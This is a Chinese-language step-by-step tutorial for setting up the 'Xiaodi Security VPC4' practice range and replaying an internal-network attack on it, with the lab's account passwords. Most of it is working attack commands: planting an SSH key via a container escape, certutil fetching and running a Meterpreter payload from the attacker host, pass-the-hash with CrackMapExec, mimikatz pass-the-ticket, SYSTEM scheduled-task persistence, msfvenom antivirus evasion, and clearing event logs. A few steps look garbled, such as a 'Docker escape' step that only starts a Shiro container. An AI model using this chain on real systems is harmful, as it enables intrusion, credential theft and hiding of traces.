新手避坑指南:手把手搭建小迪安全VPC4靶场并复现内网攻防(附全部账号密码与命令)
零基础实战小迪安全VPC4靶场搭建与内网渗透全流程解析第一次接触内网渗透时最令人头疼的往往不是技术原理而是环境搭建这个拦路虎。本文将带你从零开始用最直观的方式完成小迪安全VPC4靶场的部署与攻防复现。不同于单纯罗列命令的技术文档这里会详细解释每个步骤的底层逻辑并标注新手容易踩坑的细节。1. 靶场环境准备与初始化1.1 虚拟机镜像获取与验证建议从官方渠道下载以下镜像文件Ubuntu攻击机预装Kali工具集Windows Server 2008 DC域控制器Windows 10通达OA模拟环境Windows Server 2012SQL Server重要验证步骤# 检查镜像SHA256值确保完整性 sha256sum Ubuntu_Attack.img sha256sum Win2008_DC.img1.2 网络拓扑配置典型实验环境应采用NATHost-Only混合模式设备类型网络适配器1网络适配器2Ubuntu攻击机NATHost-OnlyWin2008DCHost-Only-Win10-通达OAHost-Only-注意VirtualBox用户需在全局设置中创建名为vboxnet0的Host-Only网络1.3 系统账号核对启动所有虚拟机后请确认以下默认凭证Windows域账户域名God域管administrator/Admin12345普通用户webadmin/admin!#45本地管理员账户- Win10通达OA * administrator/admin!#456 * xiaosedi/xsd!#45 - Win2008 WebServer * .\administrator/admin!#452. 攻击面建立与初始突破2.1 Docker逃逸漏洞利用在Ubuntu攻击机上执行cd /home/kali/Desktop/vulhub/shiro/CVE-2016-4437 docker-compose up -d关键问题排查若报错permission denied需执行sudo chmod x /usr/local/bin/docker-compose检查容器状态docker ps -a | grep shiro2.2 持久化后门部署成功利用漏洞后通过以下步骤建立SSH通道# 查看磁盘分区 fdisk -l # 挂载主机磁盘 mkdir /test mount /dev/sda3 /test # 写入SSH公钥 echo ssh-rsa AAAAB3Nza... /test/root/.ssh/authorized_keys经验提示建议使用新终端测试SSH连接保持当前会话用于后续操作3. 横向移动技术实战3.1 通达OA漏洞链利用通过已建立的通道上传MSF木马# Python简易HTTP服务 python3 -m http.server 8080在Windows靶机执行certutil -urlcache -split -f http://攻击机IP:8080/1115.exe C:\1115.exe Start-Process C:\1115.exeMSF监听配置要点use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 监听IP set LPORT 1115 set ExitOnSession false run -j3.2 密码喷射攻击实战使用CrackMapExec进行自动化测试proxychains4 crackmapexec smb 192.168.3.21-32 \ -u administrator -H 518b98ad4178a53695dc997aa02d455c \ --local-auth -x cmd /c whoami参数解析-H指定NTLM哈希--local-auth强制本地账户认证-x执行远程命令4. 权限提升与域控突破4.1 Kerberos票据攻击从内存导出票据后mimikatz.exe privilege::debug sekurlsa::tickets /export注入票据实现权限提升kerberos::ptt [0;3e4]-2-1-40e00000-SQLSERVER$krbtgt-GOD.ORG.kirbi验证票据有效性dir \\owa2010cn-god\c$4.2 计划任务持久化通过schtasks创建隐蔽通道schtasks /create /s 192.168.3.21 /ru SYSTEM /tn beacon /sc DAILY /tr C:\1115.exe /F schtasks /run /s 192.168.3.21 /tn beacon5. 防御规避与痕迹清理5.1 木马免杀处理使用以下技术降低检测率分段加密payload合法证书签名API调用混淆实用混淆命令msfvenom -p windows/x64/meterpreter/reverse_tcp \ LHOST192.168.3.130 LPORT1115 -f exe -e x86/shikata_ga_nai \ -i 5 -x legit.exe -k -o web.exe5.2 日志清除技巧在Windows靶机上执行# 清除系统日志 wevtutil cl System wevtutil cl Security wevtutil cl Application # 删除文件操作记录 Remove-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs -Name *